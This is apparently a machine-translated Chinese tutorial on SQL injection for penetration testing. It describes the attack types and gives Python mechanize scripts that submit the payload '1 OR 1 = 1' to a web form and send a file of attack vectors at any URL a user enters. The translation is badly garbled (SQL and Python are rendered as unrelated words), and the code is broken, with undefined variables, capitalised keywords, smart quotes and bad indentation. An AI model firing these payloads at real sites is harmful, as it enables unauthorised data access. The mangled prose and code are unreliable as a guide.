Python Penetration Testing - SQLi Web Attack

注入是一套结构图卡的指挥系统,安装在URL 阵列或数据结构中,以便从与网络应用有关的数据库中检索我们想要的对策。 这类攻击通常发生在使用PHP或ASP开发的网页上。 NET。

可以用以下意图进行注射攻击:

修改数据库的内容

修改数据库的内容

2. 进行申请不允许的不同查询

这类攻击在申请没有适当验证投入之前,先通过文件库。 喷洒通常放入地址、搜索场或数据场。

检测网络应用是否容易遭到注射攻击的最容易的方法是使用“KQ”的“特征,看看你是否有错误。

Types of SQLi Attack

在本节中,我们将了解不同类型的卡西袭击。 攻击可分为两类:

带内卡注射

优惠注射

带内卡注射

这是最常见的注射方式。 这种注射主要发生在攻击者能够利用同一通信渠道发射攻击和袭击营地时;结果被混为一谈。 带内插射进一步分为两类:

采用基于错误的KQ射技术,依靠数据库服务器发射的错误信息获取数据库结构的信息。

。 这是另一个带宽的投射技术,利用UNION操作员将两个或两个以上的SGET声明的结果合并为单一结果,然后作为吉大港山区方案对策的一部分退回。

优惠注射

在这种类型的卡片注射袭击中,袭击者无法看到攻击波段的结果,因为没有通过网络应用程序转移数据。 这也是“盲人”的原因。 优惠注射是两种类型的:

。 这种技术依赖向数据库发送一张卡片,这就迫使申请返回不同的结果,取决于这些盘点是否返回了TRIE或FLSE的结果。

基于时间的盲人- 这种技术依赖向数据库发送一个查询单,迫使数据库在作出答复之前等待一定时间(秒)。 答复时间将向袭击者表明,盘问的结果是TUE还是FALSE。

Example

所有类型的卡基里都可以通过操纵应用的投入数据加以实施。 在以下例子中,我们撰写了一部“灰色”文字,以注射攻击病媒,分析结果,以核实袭击的可能性。 在此,我们将使用名为mechanize的浏览器模块,该模块使获得网页表格的设施也便于提交投入值。 我们还利用这一模块进行客户验证。

以下文字帮助提交表格,并利用mechanize分析答复。

首先,我们需要进口机械化模块。

import mechanize

现在,在提交答复表后,提供URL的名称。

url = input("Enter the full url")

下面的法典将开放。

request = mechanize.Browser()
request.open(url)

现在,我们需要选择形式。

request.select_form(nr = 0)

在此,我们将确定“id”一栏。

request["id"] = "1 OR 1 = 1"

现在,我们需要提交表格。

response = request.submit()
content = response.read()
print content

以上文字将印出对《名册》要求的答复。 我们提交了一份攻击媒介,以打破僵局,印制表格中的所有数据,而不是一行。 所有攻击病媒都将在文字档案中保存,即病媒。 现在,下面的“灰色”文字将把这些攻击病媒从档案中带走,然后把他们交给服务器。 它还将把产出节省到档案中。

首先,让我们进口机械化模块。

import mechanize

现在,在提交答复表后,提供URL的名称。

url = input("Enter the full url")
   attack_no = 1

我们需要从档案中读到攻击媒介。

With open (‘vectors.txt’) as v:

现在,我们将向每个传讯者发出请求。

For pne in v:
   browser.open(url)
   browser.select_form(nr = 0)
   browser[“id”] = pne
   res = browser.submit()
content = res.read()

下面的法典将撰写对产出文件的答复。

output = open(‘response/’ + str(attack_no) + ’.txt’, ’w’)
output.write(content)
output.close()
print attack_no
attack_no += 1

通过检查和分析这些对策,我们可以确定可能的袭击。 例如,如果它提供包括在内的回复,你在Kingsyntax上有一个错误。 因此,这意味着表格可能受到Kalk注射的影响。